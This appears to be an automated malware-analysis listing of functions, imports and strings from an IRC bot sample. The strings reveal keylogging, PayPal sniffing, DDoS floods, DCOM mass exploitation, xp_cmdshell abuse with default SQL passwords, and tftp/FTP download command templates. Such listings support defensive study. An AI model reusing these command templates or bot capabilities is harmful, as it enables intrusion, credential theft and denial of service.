Index of %s</TIT"... "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""... "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"... "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"... "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"... ".." "." "PM" "AM" "%2.2d/%2.2d/%4d %2.2d:%2.2d %s" "<%s>" "PRIVMSG %s :%-31s %-21s\n" "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\"" "%s%s/" "\"><CODE>%.29s>/</CODE></A>" "\"><CODE>%s/</CODE></A>" "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"... "<%s>" "%-31s %-21s\r\n" "PRIVMSG %s :%-31s %-21s (%s bytes)\n" "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\"" "%s%s" "\"><CODE>%.30s></CODE></A>" "\"><CODE>%s</CODE></A>" "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"... "%-31s %-21s (%i bytes)\r\n" "PRIVMSG %s :Found %s Files and %s Direc"... "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"... "Found: %i Files and %i Directories\r\n" </pre></td></tr><tr id="sub_40E284"><td><pre><a name="sub_40E284"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40E284">sub_40E284</a>(3fe3): ADVAPI32.IsValidSecurityDescriptor "Share name: Resource: "... "Yes" "No" "%-14S %-24S %-6u %-4s" </pre></td></tr><tr id="sub_40BBF6"><td><pre><a name="sub_40BBF6"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40BBF6">sub_40BBF6</a>(423a): "%dd %dh %dm" </pre></td></tr><tr id="sub_416F93"><td><pre><a name="sub_416F93"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_416F93">sub_416F93</a>(42e0): WS2_32.closesocket </pre></td></tr><tr id="sub_40D93C"><td><pre><a name="sub_40D93C"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40D93C">sub_40D93C</a>(43c6): WS2_32.closesocket WS2_32.WSACleanup KERNEL32.Sleep KERNEL32.CloseHandle </pre></td></tr><tr id="sub_40B0A0"><td><pre><a name="sub_40B0A0"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40B0A0">sub_40B0A0</a>(4691): "sfc_os.dll" </pre></td></tr><tr id="sub_41EE5D"><td><pre><a name="sub_41EE5D"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_41EE5D">sub_41EE5D</a>(4bef): KERNEL32.GetProcAddress USER32.GetActiveWindow USER32.GetLastActivePopup USER32.MessageBoxA "user32.dll" "MessageBoxA" "GetActiveWindow" "GetLastActivePopup" </pre></td></tr><tr id="sub_40ABB7"><td><pre><a name="sub_40ABB7"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40ABB7">sub_40ABB7</a>(4c5f): "%sdel.bat" "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"... "%%comspec%% /c %s %s" </pre></td></tr><tr id="sub_406047"><td><pre><a name="sub_406047"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_406047">sub_406047</a>(4c69): WS2_32.closesocket "\\%s" "%s%s" "\n" "*" </pre></td></tr><tr id="sub_416233"><td><pre><a name="sub_416233"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_416233">sub_416233</a>(4ec8): USER32.FindWindowA "mIRC" </pre></td></tr><tr id="sub_404969"><td><pre><a name="sub_404969"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_404969">sub_404969</a>(505f): KERNEL32.Sleep "sa" "root" "admin" "DRIVER={SQL Server};SERVER=%s,%d;UID=%s"... "EXEC master..xp_cmdshell 'del eq&echo o"... "EXEC master..xp_cmdshell '%s'" "Dcom135" </pre></td></tr><tr id="sub_5C3797"><td><pre><a name="sub_5C3797"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_5C3797">sub_5C3797</a>(513b): KERNEL32.WideCharToMultiByte </pre></td></tr><tr id="sub_4094AE"><td><pre><a name="sub_4094AE"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_4094AE">sub_4094AE</a>(5197): KERNEL32.GetProcessHeap </pre></td></tr><tr id="sub_4033C9"><td><pre><a name="sub_4033C9"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_4033C9">sub_4033C9</a>(525d): WS2_32.send WS2_32.recv </pre></td></tr><tr id="sub_407B45"><td><pre><a name="sub_407B45"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_407B45">sub_407B45</a>(5576): WS2_32.ntohs WS2_32.socket WS2_32.WSAAsyncSelect WS2_32.bind WS2_32.listen WS2_32.accept WS2_32.inet_ntoa WS2_32.closesocket </pre></td></tr><tr id="sub_405EC5"><td><pre><a name="sub_405EC5"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_405EC5">sub_405EC5</a>(5a57): WS2_32.send WS2_32.closesocket "text/html" "application/octet-stream" "ddd, dd MMM yyyy" "HH:mm:ss" "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"... "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"... </pre></td></tr><tr id="sub_40D682"><td><pre><a name="sub_40D682"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40D682">sub_40D682</a>(5b85): KERNEL32.GetDiskFreeSpaceExA </pre></td></tr><tr id="sub_40A9AA"><td><pre><a name="sub_40A9AA"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40A9AA">sub_40A9AA</a>(5bd7): "%s Error: %s <%d>." </pre></td></tr><tr id="sub_41F7F0"><td><pre><a name="sub_41F7F0"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_41F7F0">sub_41F7F0</a>(6338): "1#SNAN" "1#IND" "1#INF" "1#QNAN" </pre></td></tr><tr id="sub_40DDD4"><td><pre><a name="sub_40DDD4"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40DDD4">sub_40DDD4</a>(6353): "The specified service name is invalid." "The requested control code is undefined"... "The handle is invalid." "The handle does not have the required a"... "The service binary file could not be fo"... "The service cannot be stopped because o"... "The database is locked." "A thread could not be created for the s"... "The process for the service was started"... "The requested control code is not valid"... "An instance of the service is already r"... "The system is shutting down." "An unknown error occurred: <%ld>" </pre></td></tr><tr id="sub_409794"><td><pre><a name="sub_409794"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_409794">sub_409794</a>(658e): KERNEL32.GetModuleHandleA KERNEL32.GetProcAddress KERNEL32.LoadLibraryA WININET.InternetOpenA "kernel32.dll" "SetErrorMode" "CreateToolhelp32Snapshot" "Process32First" "GetDiskFreeSpaceExA" "GetLogicalDriveStringsA" "SearchPathA" "QueryPerformanceCounter" "QueryPerformanceFrequency" "RegisterServiceProcess" "user32.dll" "SendMessageA" "FindWindowA" "IsWindow" "GetClipboardData" "CloseClipboard" "GetAsyncKeyState" "GetKeyState" "GetWindowTextA" "GetForegroundWindow" "advapi32.dll" "RegCreateKeyExA" "RegSetValueExA" "RegQueryValueExA" "RegDeleteValueA" "RegCloseKey" "OpenProcessToken" "LookupPrivilegeValueA" "AdjustTokenPrivileges" "OpenSCManagerA" "OpenServiceA" "ControlService" "CloseServiceHandle" "EnumServicesStatusA" "IsValidSecurityDescriptor" "GetUserNameA" "gdi32.dll" "CreateDCA" "CreateDIBSection" "CreateCompatibleDC" "GetDIBColorTable" "SelectObject" "BitBlt" "DeleteDC" "DeleteObject" "ws2_32.dll" "WSAStartup" "WSASocketA" "WSAAsyncSelect" "__WSAFDIsSet" "WSAIoctl" "WSAGetLastError" "WSACleanup" "socket" "ioctlsocket" "connect" "inet_ntoa" "inet_addr" "htons" "htonl" "ntohs" "ntohl" "send" "sendto" "recv" "recvfrom" "bind" "select" "listen" "accept" "setsockopt" "getsockname" "gethostname" "getpeername" "closesocket" "wininet.dll" "InternetGetConnectedState" "InternetGetConnectedStateEx" "HttpOpenRequestA" "HttpSendRequestA" "InternetConnectA" "InternetOpenUrlA" "InternetCrackUrlA" "InternetReadFile" "InternetCloseHandle" "Mozilla/4.0 (compatible)" "icmp.dll" "IcmpCreateFile" "IcmpCloseHandle" "IcmpSendEcho" "netapi32.dll" "NetShareAdd" "NetShareDel" "NetShareEnum" "NetScheduleJobAdd" "NetApiBufferFree" "NetRemoteTOD" "NetUserAdd" "NetUserDel" "NetUserEnum" "NetUserGetInfo" "NetMessageBufferSend" "dnsapi.dll" "DnsFlushResolverCache" "DnsFlushResolverCacheEntry_A" "iphlpapi.dll" "DeleteIpNetEntry" "mpr.dll" "WNetAddConnection2A" "WNetAddConnection2W" "WNetCancelConnection2A" "WNetCancelConnection2W" "shell32.dll" "SHChangeNotify" "odbc32.dll" "SQLDriverConnect" "SQLAllocHandle" "avicap32.dll" "capCreateCaptureWindowA" "capGetDriverDescriptionA" </pre></td></tr><tr id="sub_4018CA"><td><pre><a name="sub_4018CA"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_4018CA">sub_4018CA</a>(6960): WS2_32.ntohs </pre></td></tr><tr id="sub_415B28"><td><pre><a name="sub_415B28"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_415B28">sub_415B28</a>(6a64): ADVAPI32.OpenProcessToken ADVAPI32.LookupPrivilegeValueA ADVAPI32.AdjustTokenPrivileges </pre></td></tr><tr id="sub_40B0E7"><td><pre><a name="sub_40B0E7"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40B0E7">sub_40B0E7</a>(6b9c): "r+b" "Can not open TCPIP.SYS, version %d." "TCPIP.SYS fixed, version %d." "##sodoma_3t" </pre></td></tr><tr id="sub_40BA41"><td><pre><a name="sub_40BA41"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40BA41">sub_40BA41</a>(6c22): KERNEL32.SearchPathA KERNEL32.CreatePipe KERNEL32.GetCurrentProcess KERNEL32.CloseHandle "cmd.exe" </pre></td></tr><tr id="sub_40894E"><td><pre><a name="sub_40894E"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40894E">sub_40894E</a>(6f62): USER32.IsWindow USER32.SendMessageA USER32.DestroyWindow "Window" </pre></td></tr><tr id="sub_404197"><td><pre><a name="sub_404197"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_404197">sub_404197</a>(706b): WS2_32.inet_addr WS2_32.ntohs WS2_32.socket WS2_32.connect WSOCK32.recv WS2_32.send WS2_32.closesocket "tftp -i %s get %s\r\n" "echo open %s %d > o&echo user 1 1 >> o "... </pre></td></tr><tr id="sub_40F6F1"><td><pre><a name="sub_40F6F1"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40F6F1">sub_40F6F1</a>(761a): WS2_32.WSAStartup WS2_32.gethostbyname WS2_32.socket WS2_32.ntohs WS2_32.connect WSOCK32.recv WS2_32.send WS2_32.closesocket WS2_32.WSACleanup SHELL32.ShellExecuteA WS2_32.getsockname WS2_32.inet_ntoa WS2_32.inet_addr WS2_32.gethostbyaddr DNSAPI.DnsFlushResolverCache " :" " " "!" "PING" "PONG %s\r\n" "JOIN %s %s\r\n" "001" "005" "302" "@" "433" "NICK %s\r\n" "KICK" "NOTICE %s :%s\r\n" "JOIN %s %s\r\n" "NICK" ":%s%s" "PART" "QUIT" "353" "PART" "NOTICE %s :%s\r\n" "PRIVMSG" "NOTICE" "SEND" "%s has just versioned me." "CHAT" "irc.activate" "irc.act" " :" "$%d-" "$%d" "$me" "$user" "$chan" "$rndnick" "$server" "$chr(" "$chr(" ")" "63" "$chr(" " " " " "irc.rndnick" "rn" "irc.die" "irc.di" "irc.logout" "lo" "irc.version" "ver" "lockdown.on" "ld.on" "lockdown.off" "ld.off" "proxy.socks4.on" "proxy.s4.on" "proxy.socks4.off" "Server" "Server" "proxy.redirect.off" "daemon.tftp.off" "Server" "util.findfile.off" "util.ff.off" "com.ps.off" "clone.off" "Clone" "Secure" "root.stop" "Scan" "Exploitation" "root.stats" "root.st" "irc.r" "irc.disconnect" "irc.d" "irc.quit" "irc.q" "irc.status" "irc.s" "irc.id" "irc.i" "com.rebewt" "threads.list" "threads.l" "irc.aliases" "irc.al" "irc.log" "irc.lg" "util.clg" "com.netinfo" "com.ni" "com.sysinfo" "com.si" "irc.discordanc33" "irc.disco33" "com.procs" "com.ps" "com.harvest" "com.key" "com.uptime" "com.up" "com.drv" "com.testdlls" "com.dll" "com.opencmd" "com.ocmd" "com.ocmd.off" "Remote shell" "[CMD]" "irc.who" "-[Login List]-" "<Empty>" "%d. %s" "com.getclip" "com.gc" "util.farp" "util.fdns" "root.currentip" "root.cip" "daemon.httpd.on" "daemon.tftp.on" "daemon.tf.on" "com.findpass" "com.fp" "root.massexploit" "root.mass" "irc.nick" "irc.n" "irc.join" "irc.j" "irc.part" "irc.pt" "irc.raw" "irc.ra" "threads.kill" "threads.k" "clone.quit" "clone.q" "clone.rn" "irc.prefix" "irc.pr" "com.open" "com.o" "irc.setserve" "irc.se" "irc.dns" "irc.dn" "com.killprocname" "com.kpn" "com.prockillid" "com.pkid" "com.delete" "com.del" "dcc.get" "dcc.gt" "com.filelist" "com.fl" "irc.visit" "irc.v" "mirc.cmd" "mirc.cmd" "com.cmd" "com.cm" "com.readfile" "com.rf" "psniff" "on" ".n.z.m. (psniff.p.l.g) .��. Already ru"... "##sodoma_3s" ".n.z.m. (psniff.p.l.g) .��. Carnivore "... ".n.z.m. (psniff.p.l.g) .��. Failed to "... "off" ".n.z.m. (psniff.p.l.g) .��. Carnivore "... ".n.z.m. (psniff.p.l.g) .��. No Carnivo"... "sniffer" "on" ".n.z.m. (sniffer.p.l.g) .��. Already ru"... "##sodoma_3s" ".n.z.m. (sniffer.p.l.g) .��. packet sni"... ".n.z.m. (sniffer.p.l.g) .��. Failed to "... "off" ".n.z.m. (sniffer.p.l.g) .��. sniffer s"... ".n.z.m. (sniffer.p.l.g) .��. No sniffer"... "keylog" "cmd.kl.on" "offz" "offz" "sys.net" "start" "stop" "pause" "continue" "delete" "share" "user" "send" "com.capture" "com.cap" "irc.gethost" "irc.gh" "irc.addalias" "irc.aa" "irc.privmsg" "irc.pm" "irc.action" "irc.ac" "irc.cycle" "irc.cy" "irc.mode" "irc.m" "clone.raw" "clone.ra" "clone.mode" "clone.m" "clone.nick" "clone.ni" "clone.join" "clone.j" "clone.part" "clone.p" "irc.repeat" "irc.rp" "irc.delay" "irc.de" "download.updat4m13" "com.execute" "com.e" "findfile" "ff" "com.rename" "com.mv" "ddos.icmp" "ddos.ic" "clone.make" "clone.start" "ddos.syn" "ddos.ack" "ddos.random" "ddos.synf" "download.wgett4m13" "daemon.redirect" "daemon.rd" "root.ps" "clone.pm" "clone.action" "clone.ac" "root.start" "root.s" "ddos.udpf" "u" "ddos.pingflood" "ddos.pingf" "p" "ddos.tcpf" "util.email" " " "_" "helo $rndnick\nmail from: <%s>\nrcpt to: "... "util.httpcon" "util.hcon" "ftp.upload" "%s\\%i%i%i.dll" "ab" "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n" "-s:%s" "ftp.exe" "open" "syn" "ack" "random" "Spoofed" "Normal" "ICMP.dll not available" "##sodoma_3e" "Sequential" "[%s] * %s %s" "[%s] <%s> %s" "arra" "%s%s.exe" "repeat" "MODE %s\r\n" "JOIN %s %s\r\n" "screen" "drivers" "frame" "video" "Keylog" ".n.z.m. (keylog.p.l.g) .��." ".n.z.m. (keylog.p.l.g) .��. Already ru"... "pay" "##sodoma_3s" ".n.z.m. (keylog.p.l.g) .��. Pay sites "... "normal" "##sodoma_3s" ".n.z.m. (keylog.p.l.g) .��. Normal key"... ".n.z.m. (keylog.p.l.g) .��. Failed to "... ".n.z.m. (keylog.p.l.g) .��. Unknow mod"... "r" "\n" "open" "QUIT :later\r\n" "all" "JOIN %s %s\r\n" "NICK %s\r\n" "##sodoma_3e" "##sodoma_3e" "Sequential" "full" "arra" "QUIT :%s\r\n" "QUIT :later\r\n" "QUIT :disconnecting\r\n" "QUIT :reconnecting\r\n" "secure" "sec" "Unsecuring" "NzM Priv Release by Ud2" "NICK %s\r\n" "!" "~" "c0d1am0z3" "NOTICE %s :Nice try, idiot. (%s!%s).\r\n" "NOTICE %s :You've been logged.\r\n" "NOTICE %s :Nice try, idiot. (%s!%s).\r\n" "NOTICE %s :You've been logged.\r\n" "c0d1am0z3" "USERHOST %s\r\n" "-xt+iB" "MODE %s %s\r\n" "JOIN %s %s\r\n" </pre></td></tr><tr id="sub_40967B"><td><pre><a name="sub_40967B"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40967B">sub_40967B</a>(76b1): NTDLL.RtlRunDecodeUnicodeString </pre></td></tr><tr id="sub_40B7FD"><td><pre><a name="sub_40B7FD"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40B7FD">sub_40B7FD</a>(7918): KERNEL32.CloseHandle </pre></td></tr><tr id="sub_402B92"><td><pre><a name="sub_402B92"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_402B92">sub_402B92</a>(79f8): "Bot sniff" "##sodoma_3" "[PSNIFF]:" "PSNIFF//" "JOIN #" "302 " "366 " ":.login" ":!login" ":!Login" ":.Login" ":.ident" ":!ident" ":.hashin" ":!hashin" </pre></td></tr><tr id="sub_4042F8"><td><pre><a name="sub_4042F8"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_4042F8">sub_4042F8</a>(7bee): WS2_32.ntohs WS2_32.send WSOCK32.recv </pre></td></tr><tr id="sub_41DD12"><td><pre><a name="sub_41DD12"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_41DD12">sub_41DD12</a>(7e1a): KERNEL32.WideCharToMultiByte "TZ" </pre></td></tr><tr id="sub_40B45B"><td><pre><a name="sub_40B45B"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40B45B">sub_40B45B</a>(8006): IPHLPAPI.IcmpCreateFile WS2_32.inet_addr WS2_32.gethostbyname IPHLPAPI.IcmpSendEcho IPHLPAPI.IcmpCloseHandle </pre></td></tr><tr id="sub_40327E"><td><pre><a name="sub_40327E"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40327E">sub_40327E</a>(8131): WS2_32.send "arrapato" "arrapao" "4492" "echo open %s %d >> eq&echo user %s %s >"... </pre></td></tr><tr id="sub_4076D2"><td><pre><a name="sub_4076D2"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_4076D2">sub_4076D2</a>(82b0): WS2_32.inet_ntoa "dcom135" </pre></td></tr><tr id="sub_40C86D"><td><pre><a name="sub_40C86D"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40C86D">sub_40C86D</a>(8474): WS2_32.socket WS2_32.ntohs WS2_32.inet_addr WS2_32.gethostbyname WS2_32.connect WS2_32.closesocket </pre></td></tr><tr id="sub_4059D0"><td><pre><a name="sub_4059D0"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_4059D0">sub_4059D0</a>(85c2): "rb" </pre></td></tr><tr id="sub_4170E6"><td><pre><a name="sub_4170E6"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_4170E6">sub_4170E6</a>(8732): "%s: %s stopped. (%d thread(s) stopped.)"... "%s: No %s thread found." </pre></td></tr><tr id="sub_40E4EB"><td><pre><a name="sub_40E4EB"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40E4EB">sub_40E4EB</a>(893c): "Account: %S" "Full Name: %S" "User Comment: %S" "Comment: %S" "Unknown" "Administrator" "User" "Guest" "Privilege Level: %s" "Auth Flags: %d" "Home Directory: %S" "Parameters: %S" "Password Age: %d" "Bad Password Count: %d" "Number of Logins: %d" "Last Logon: %d" "Last Logoff: %d" "Logon Server: %S" "Country Code: %d" "User's Language: %d" "Max. Storage: %d" </pre></td></tr><tr id="sub_40E14E"><td><pre><a name="sub_40E14E"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40E14E">sub_40E14E</a>(8cdb): KERNEL32.WideCharToMultiByte </pre></td></tr><tr id="sub_40381E"><td><pre><a name="sub_40381E"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40381E">sub_40381E</a>(8edc): WS2_32.send WS2_32.recv "Dcom135" </pre></td></tr><tr id="sub_403E35"><td><pre><a name="sub_403E35"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_403E35">sub_403E35</a>(9107): WS2_32.socket WS2_32.ntohs WS2_32.inet_addr WS2_32.connect WS2_32.send WSOCK32.recv WS2_32.closesocket "Dcom135" </pre></td></tr><tr id="sub_40AEBE"><td><pre><a name="sub_40AEBE"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40AEBE">sub_40AEBE</a>(920d): DNSAPI.DnsFlushResolverCache </pre></td></tr><tr id="sub_40AECD"><td><pre><a name="sub_40AECD"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40AECD">sub_40AECD</a>(92a8): IPHLPAPI.GetIpNetTable IPHLPAPI.DeleteIpNetEntry </pre></td></tr><tr id="sub_40EA39"><td><pre><a name="sub_40EA39"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40EA39">sub_40EA39</a>(9bb4): "Invalid parameter." "Server name not found." "This network request is not supported." "Not enough memory." "The name is invalid." "Duplicate share name." "Invalid for redirected resource." "Device or directory does not exist." "Level parameter is invalid." "A general failure occurred in the netwo"... "The operation is allowed only on the pr"... "The user account already exists." "The group already exists." "The password is shorter than required ("... "An unknown error occurred." "The computer name is invalid." "Share not found." "The user name could not be found." "Network connection not found." </pre></td></tr><tr id="sub_40AB95"><td><pre><a name="sub_40AB95"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40AB95">sub_40AB95</a>(9dbe): USER32.ExitWindowsEx "SeShutdownPrivilege" </pre></td></tr><tr id="sub_40F576"><td><pre><a name="sub_40F576"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40F576">sub_40F576</a>(9e1f): WS2_32.send WS2_32.closesocket WSOCK32.recv "PASS %s\r\n" </pre></td></tr><tr id="sub_401A6D"><td><pre><a name="sub_401A6D"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_401A6D">sub_401A6D</a>(9e5d): WS2_32.WSAStartup WS2_32.WSASocketA WSOCK32.setsockopt WS2_32.ntohs WS2_32.ntohl WS2_32.sendto WS2_32.WSAGetLastError WS2_32.closesocket WS2_32.WSACleanup </pre></td></tr><tr id="sub_401447"><td><pre><a name="sub_401447"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_401447">sub_401447</a>(9fdc): WS2_32.socket WS2_32.WSAGetLastError WSOCK32.setsockopt WS2_32.inet_addr WS2_32.ntohs KERNEL32.GetTickCount WS2_32.sendto WS2_32.closesocket </pre></td></tr><tr id="sub_402368"><td><pre><a name="sub_402368"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_402368">sub_402368</a>(a134): USER32.GetForegroundWindow USER32.GetWindowTextA USER32.GetAsyncKeyState USER32.GetKeyState </pre></td></tr><tr id="sub_40917E"><td><pre><a name="sub_40917E"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40917E">sub_40917E</a>(a694): KERNEL32.GetProcessHeap NTDLL.RtlAllocateHeap NTDLL.ZwQuerySystemInformation NTDLL.RtlCreateQueryDebugBuffer NTDLL.RtlQueryProcessDebugInformation NTDLL.RtlDestroyQueryDebugBuffer "WINLOGON" "NWGINA" "MSGINA" </pre></td></tr><tr id="sub_40707C"><td><pre><a name="sub_40707C"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40707C">sub_40707C</a>(a6b1): " %s: %d," " Total: %d in %s." </pre></td></tr><tr id="sub_407635"><td><pre><a name="sub_407635"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_407635">sub_407635</a>(a6ca): WS2_32.socket WS2_32.ntohs WS2_32.ioctlsocket WS2_32.connect WS2_32.select WS2_32.closesocket </pre></td></tr><tr id="sub_404D78"><td><pre><a name="sub_404D78"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_404D78">sub_404D78</a>(a900): "\\\\%s" "." "\\\\%s\\pipe\\wkssvc" "Dcom135" "[%s]: Exploiting IP: %s." </pre></td></tr><tr id="sub_40E8B9"><td><pre><a name="sub_40E8B9"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40E8B9">sub_40E8B9</a>(a909): "Username accounts for local system:" " %S" "Total users found: %d." </pre></td></tr><tr id="sub_4022BD"><td><pre><a name="sub_4022BD"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_4022BD">sub_4022BD</a>(a9cd): "e-gold" </pre></td></tr><tr id="sub_401D79"><td><pre><a name="sub_401D79"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_401D79">sub_401D79</a>(ab64): KERNEL32.GetTickCount WS2_32.socket WS2_32.WSAGetLastError WSOCK32.setsockopt WS2_32.inet_addr WS2_32.ntohs WS2_32.ntohl WS2_32.sendto WS2_32.closesocket "syn" "ack" "random" </pre></td></tr><tr id="sub_41C4B6"><td><pre><a name="sub_41C4B6"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_41C4B6">sub_41C4B6</a>(aba6): "KERNEL32" "IsProcessorFeaturePresent" </pre></td></tr><tr id="sub_40A421"><td><pre><a name="sub_40A421"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40A421">sub_40A421</a>(ac3c): "Kernel32.dll failed. <%d>" "User32.dll failed. <%d>" "Advapi32.dll failed. <%d>" "Gdi32.dll failed. <%d>" "Ws2_32.dll failed. <%d>" "Wininet.dll failed. <%d>" "Icmp.dll failed. <%d>" "Netapi32.dll failed. <%d>" "Dnsapi.dll failed. <%d>" "Iphlpapi.dll failed. <%d>" "Mpr32.dll failed. <%d>" "Shell32.dll failed. <%d>" "Odbc32.dll failed. <%d>" "Avicap32.dll failed. <%d>" </pre></td></tr><tr id="sub_406979"><td><pre><a name="sub_406979"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_406979">sub_406979</a>(aed0): WS2_32.send WS2_32.WSAGetLastError </pre></td></tr><tr id="sub_40E220"><td><pre><a name="sub_40E220"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40E220">sub_40E220</a>(afa1): KERNEL32.MultiByteToWideChar </pre></td></tr><tr id="sub_417CAE"><td><pre><a name="sub_417CAE"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_417CAE">sub_417CAE</a>(b14b): KERNEL32.MultiByteToWideChar </pre></td></tr><tr id="sub_40B865"><td><pre><a name="sub_40B865"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40B865">sub_40B865</a>(b276): WS2_32.send "PRIVMSG %s :%s\r" </pre></td></tr><tr id="sub_40D639"><td><pre><a name="sub_40D639"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40D639">sub_40D639</a>(b2db): KERNEL32.GetDriveTypeA "Cdrom" "Network" "Disk" "Invalid" "Unknown" </pre></td></tr><tr id="sub_41D415"><td><pre><a name="sub_41D415"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_41D415">sub_41D415</a>(b3bb): "<program name unknown>" "..." "Runtime Error!\n\nProgram: " "\n\n" "Microsoft Visual C++ Runtime Library" </pre></td></tr><tr id="sub_40B5E7"><td><pre><a name="sub_40B5E7"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40B5E7">sub_40B5E7</a>(b7d0): WS2_32.socket WS2_32.inet_addr WS2_32.gethostbyname WS2_32.ntohs WS2_32.sendto </pre></td></tr><tr id="sub_402DA6"><td><pre><a name="sub_402DA6"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_402DA6">sub_402DA6</a>(b9cf): "HTTP sniff" "##sodoma_3" "paypal" "PAYPAL" 